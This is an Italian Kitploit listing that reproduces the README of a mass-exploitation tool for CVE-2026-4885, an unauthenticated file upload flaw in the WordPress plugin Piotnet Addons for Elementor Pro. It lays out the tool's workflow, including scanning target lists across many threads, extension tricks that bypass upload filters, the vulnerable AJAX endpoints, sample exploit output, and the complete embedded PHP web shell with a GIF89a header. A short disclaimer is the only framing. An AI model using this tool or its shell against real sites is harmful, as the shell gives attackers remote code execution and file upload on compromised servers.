Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - Caricamento file arbitrario non autenticato tramite caricamento file del modulo | Kitploit
Strumenti/GitHubGitHub/jenderal92/cve-2026-4885
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - Caricamento file arbitrario non autenticato tramite caricamento file del modulo

Vedi Repository
54 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-4885 – Piotnet Addons for Elementor Pro Mass Exploit

Caricamento arbitrario di file non autenticato che porta a Remote Code Execution (RCE) in Piotnet Addons for Elementor Pro ≤ 7.1.70.

Questo strumento è progettato per lo sfruttamento di massa – inserisci una lista di target e provvederà automaticamente a:

  • Rilevare la versione del plugin (o presupporre che sia vulnerabile se vengono trovati gli asset)
  • Eseguire ricognizioni avanzate per estrarre post_id, form_id e il nome corretto del campo di upload
  • Provare multiple estensioni PHP (.phtml, .php3, .php4, .phps, .pht, .php2) per bypassare filtri deboli
  • Caricare una shell PHP con header GIF89a (integrata, nessun file esterno necessario)
  • Divulgare l'URL della shell caricata tramite pafe_export_database
  • Verificare l'esecuzione della shell (cerca la stringa Logic_Internet) e salvare l'URL in shells.txt

⚠️ Disclaimer
Questo strumento è destinato esclusivamente a test di sicurezza educativi e autorizzati.
L'uso non autorizzato contro sistemi che non possiedi è illegale.

Per ulteriori disclaimer, puoi vedere quello sulla copertina di Jenderal92. Puoi controllarlo QUI !!!


Caratteristiche

  • Compatibile con Python 2.7 (funziona anche con Python 3 se adatti print/input)
  • Multi-thread – scansiona e sfrutta fino a 20 target contemporaneamente
  • Rilevamento intelligente dei form – analizza gli attributi HTML specifici di Piotnet (data-pafe-form-builder-field-name, data-elementor-id, ecc.)
  • Nessun file shell esterno – il payload PHP è integrato nello script
  • Schema URL automatico – aggiunge https:// se mancante
  • Elenco esteso di percorsi – include 22 URL di form comuni (/contact, /apply, /quote, /book-appointment, …)
  • Pattern di divulgazione – corrisponde sia a wp-content/uploads/piotnet-addons-for-elementor/ sia a percorsi root diretti

Requisiti

  • Python 2.7 (o Python 3 con modifiche minori)
  • Libreria requests
pip install requests

Installazione

git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885

Utilizzo

  1. Prepara un file di target

Crea un file chiamato targets.txt (o qualsiasi altro nome) con un URL per riga:

https://example1.com
example2.com
http://vulnerable-site.org
  1. Esegui lo exploit
python2 CVE-2026-4885.py targets.txt

Lo script:

· Mostra l'avanzamento per ogni target · Salva gli URL delle shell riuscite in shells.txt

Esempio di output

[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml

Opzioni da riga di comando (personalizzabili nello script)

Variabile Descrizione Default TIMEOUT Timeout delle richieste HTTP 10 secondi MAX_THREADS Numero di thread concorrenti 20 OUTPUT_FILE Dove salvare gli URL delle shell riuscite shells.txt EXT_LIST Estensioni file da provare .phtml, .php3, .php4, .phps, .pht, .php2

Puoi modificarle modificando l'inizio dello script.


Payload della Shell

La shell integrata è:

GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>

· Mostra le informazioni sul server, la directory di lavoro corrente e un form di upload file. · Può essere sostituita con qualsiasi altro codice PHP (basta cambiare SHELL_CODE nello script).


Come Funziona

  1. Rilevamento della versione · Cerca ?ver= negli asset del plugin nella homepage. · Come ripiego, verifica l'esistenza di file CSS/JS noti.
  2. Ricognizione · Analizza le pagine di form comuni e tutti i collegamenti interni trovati nella homepage. · Estrae post_id, form_id e il nome corretto del campo di upload dagli attributi HTML specifici di Piotnet.
  3. Upload · Invia una richiesta POST multipart a wp-admin/admin-ajax.php?action=pafe_ajax_form_builder. · Utilizza un payload JSON che imita il meccanismo di upload del plugin. · Prova tutte le estensioni in EXT_LIST finché una non riesce.
  4. Divulgazione · Richiede pafe_export_database che restituisce un CSV contenente l'URL completo del file caricato. · Analizza l'URL usando un pattern regex che corrisponde a xxx-{random}.ext.
  5. Verifica · Visita l'URL divulgato. · Controlla la presenza della stringa Logic_Internet. · Salva l'URL in shells.txt in caso di successo.

Risoluzione dei problemi

UnicodeEncodeError su Windows

Lo script include già una funzione safe_unicode() che gestisce i caratteri non ASCII. Se vedi ancora errori, assicurati che il tuo terminale supporti UTF-8:

chcp 65001

Nessun form trovato / Tutte le estensioni falliscono

· Il target potrebbe essere stato patchato o non utilizzare Piotnet Addons. · Prova ad aumentare TIMEOUT o MAX_THREADS. · Verifica manualmente che il plugin sia effettivamente installato.

La divulgazione fallisce ma l'upload riesce

· L'endpoint pafe_export_database potrebbe essere disabilitato o protetto. · Prova ad accedere manualmente a /wp-admin/admin-ajax.php?action=pafe_export_database in un browser per vedere se è accessibile.


Uso Legale ed Etico

· Usa questo strumento solo su sistemi per cui hai il permesso scritto di testare. · L'autore non è responsabile di qualsiasi uso improprio o danno causato. · Rispetta tutte le leggi applicabili.

Scarica lo strumento